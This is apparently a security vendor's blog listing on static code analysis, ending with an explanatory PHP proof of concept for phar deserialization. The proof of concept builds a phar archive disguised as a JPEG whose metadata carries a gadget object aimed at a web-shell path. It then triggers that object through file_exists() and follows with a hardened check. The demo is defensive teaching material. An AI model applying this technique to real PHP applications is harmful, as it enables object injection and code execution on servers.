RIPS Scores a Perfect 100% at OWASP Benchmark

21 min read 10 Mar 2020 by Malte Skoruppa
The OWASP Benchmark suite aims to measure the quality of vulnerability detection tools by exposing them to hundreds of test cases that contain both real vulnerabilities and deliberate false positives. Our SAST solution RIPS achieves a 100% true positive rate at a 0% false positive rate on this suite, a result no other SAST solution has reported so far. In this blog post, we publish our results and discuss the pros and cons of popular benchmark suites.

How to Fine-Tune Static Code Analysis - Part 2

12 min read 17 Dec 2019 by Johannes Dahse
Static code analysis is a powerful tool for automated security testing of applications. The more closely an analysis is tailored to your programming language and your individual code, the more efficient and accurate the results are. In the second part of our fine-tuning guide, we dive deeper into our analysis approach and show how to fully customize it with 5 advanced settings.

How to Fine-Tune Static Code Analysis - Part 1

10 min read 10 Dec 2019 by Johannes Dahse
A good SAST solution works out of the box for any code base, but a few configuration options help to squeeze the most out of your code analysis. These options depend on the logic and environment of your application, as well as on what you expect from the scan results. In this blog post, we look at 5 basic options for fine-tuning static analysis to your needs.

5 Best Practices for your SAST Evaluation

11 min read 26 Feb 2019 by Johannes Dahse
Choosing the right solution for automated security testing is hard. A good approach is to run a proof of concept (POC) with several vendors so you can verify marketing claims before adding yet another piece of software to your stack. Our best practices help you prepare an efficient and thorough evaluation, so you can tell snake oil from cutting-edge technology and make the best choice.

What is Phar Deserialization

5 min read 14 Aug 2018 by Johannes Dahse
Last week a new exploitation technique for PHP applications was announced at the Black Hat USA conference: unserialization of phar archive metadata triggered by ordinary file operations on a phar:// path. Find out everything you need to know in this blog post.
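The primitive behind the technique, as an added, self-contained illustration (this is not code from the RIPS post or from the original Black Hat talk): the attacker builds a valid phar archive whose metadata holds a serialized object, and the victim application never calls unserialize() itself, yet a plain file_exists() on a phar:// path opens the archive through the phar stream wrapper, which unserializes the metadata. The class name LogWriter, the file names and the check_upload() / safe_check_upload() functions are assumptions made for this demo. It assumes PHP 7.x with the phar extension and phar.readonly=0 (needed only to build the archive, which is the attacker's step); since PHP 8.0 the stream wrapper no longer unserializes metadata automatically, so the victim side of this demo does not fire there.

```php
<?php
// Added example, not from the original post. Run with:
//   php -d phar.readonly=0 phar_demo.php
// Assumed names: LogWriter (gadget class), innocent.jpg (archive on disk),
// check_upload() / safe_check_upload() (the victim's code).

// A class with a magic method that runs on unserialization or destruction.
// In a real target this "gadget" is some existing class in the application
// or its dependencies; here it only prints, it does not write anything.
class LogWriter {
    public $path;
    public $data;
    public function __destruct() {
        echo "__destruct() reached: would write " . strlen($this->data)
           . " bytes to {$this->path}\n";
    }
}

// Stage 1 (attacker): build a phar archive with the gadget in its metadata.
// Phar::__construct() insists on a .phar extension at creation time, so the
// archive is created as .phar and then renamed to a harmless-looking name.
// The stub and an arbitrary file entry are what makes the archive valid.
$tmp     = __DIR__ . '/innocent.phar';
$archive = __DIR__ . '/innocent.jpg';
@unlink($tmp);
@unlink($archive);

$phar = new Phar($tmp);
$phar->startBuffering();
$phar->addFromString('x.txt', 'dummy');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$gadget       = new LogWriter();
$gadget->path = '/var/www/html/shell.php';   // attacker-chosen value
$gadget->data = 'payload';                   // attacker-chosen value
$phar->setMetadata($gadget);                 // serialize() happens here
$phar->stopBuffering();
unset($phar);
rename($tmp, $archive);

// Stage 2 (victim): a filesystem check on user-controlled input. There is no
// unserialize() anywhere in this function, but the phar:// wrapper parses the
// archive and unserializes its metadata, instantiating LogWriter. The
// __destruct() above then runs when that object is freed, at the latest at
// script shutdown.
function check_upload(string $userPath): bool {
    return file_exists($userPath);
}

echo "vulnerable check: ";
var_dump(check_upload('phar://' . $archive . '/x.txt'));

// Mitigation: refuse the phar scheme before any filesystem function sees the
// path. A stricter variant is to allow only the schemes you expect (e.g. none,
// or file://), or to unregister the wrapper at bootstrap:
//   stream_wrapper_unregister('phar');
function safe_check_upload(string $userPath): bool {
    if (stripos($userPath, 'phar://') === 0) {
        return false;
    }
    return file_exists($userPath);
}

echo "hardened check: ";
var_dump(safe_check_upload('phar://' . $archive . '/x.txt'));
```

The prefix check in safe_check_upload() is only a minimal illustration: the scheme can also be reached through other wrappers that accept a nested URL (for example a compress.* wrapper), so in production prefer an allowlist of accepted schemes or disabling the phar wrapper altogether, and treat any function that takes a path (file_exists(), is_file(), filesize(), copy(), the image and XML functions, and so on) as a potential sink, not only the classic ones.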